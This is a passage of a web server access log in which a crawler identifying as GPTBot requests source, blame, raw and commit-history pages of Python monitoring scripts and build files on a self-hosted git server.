compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode" +[17/Feb/2026:13:45:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 32569] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" +[17/Feb/2026:13:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27720] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" +[17/Feb/2026:13:45:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" [Client 74.7.227.38] [Length 9981] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build" [Client 74.7.227.38] [Length 9986] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:45:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" +[17/Feb/2026:13:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 13689] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:45:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 13687] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 12240] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" +[17/Feb/2026:13:45:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10973] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" +[17/Feb/2026:13:45:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 17116] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 17115] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:45:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 16980] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" +[17/Feb/2026:13:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 16980] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" +[17/Feb/2026:13:45:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" [Client 74.7.227.38] [Length 9882] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" +[17/Feb/2026:13:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build" [Client 74.7.227.38] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build" +[17/Feb/2026:13:45:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist" [Client 74.7.227.38] [Length 10132] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/dist" +[17/Feb/2026:13:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 13288] [Gzip 5.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:13:45:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 13287] [Gzip 5.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:13:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 2120] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:13:45:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build" [Client 74.7.227.38] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 11781] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:45:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:13:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 2120] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:13:45:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 711] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build" [Client 74.7.227.38] [Length 9952] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" +[17/Feb/2026:13:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" [Client 74.7.227.38] [Length 10196] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/PostgresWatchdog.spec" +[17/Feb/2026:13:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:13:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:13:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 9901] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:13:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" [Client 74.7.227.38] [Length 10410] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build" [Client 74.7.227.38] [Length 10380] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build" +[17/Feb/2026:13:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 10429] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 13659] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:13:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 17420] [Gzip 8.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:13:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 5148] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:13:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build" [Client 74.7.227.38] [Length 9854] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build" +[17/Feb/2026:13:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:13:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 17312] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:13:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 5148] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:13:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" [Client 74.7.227.38] [Length 17419] [Gzip 8.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:13:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 5308] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:13:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:13:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 13257] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:13:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 2120] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:13:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" [Client 74.7.227.38] [Length 9872] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:13:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11001] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 17084] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:13:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 17311] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:13:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 5308] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:13:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10932] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 